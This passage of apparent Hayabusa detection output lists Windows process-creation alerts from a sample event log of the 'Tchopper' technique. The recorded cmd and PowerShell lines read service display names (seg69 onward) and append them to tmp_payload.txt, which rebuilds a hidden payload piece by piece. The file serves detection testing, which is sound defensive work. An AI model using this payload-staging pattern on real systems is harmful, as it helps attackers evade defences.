+2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:07.101 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x390 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:08.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:10.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:10.036 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:11.507 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:11.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:12.952 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:14.409 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:15.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:17.308 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:18.775 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:18.790 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:21.707 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:21.722 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:27.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:27.575 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:31.906 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:31.922 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:37.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:37.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
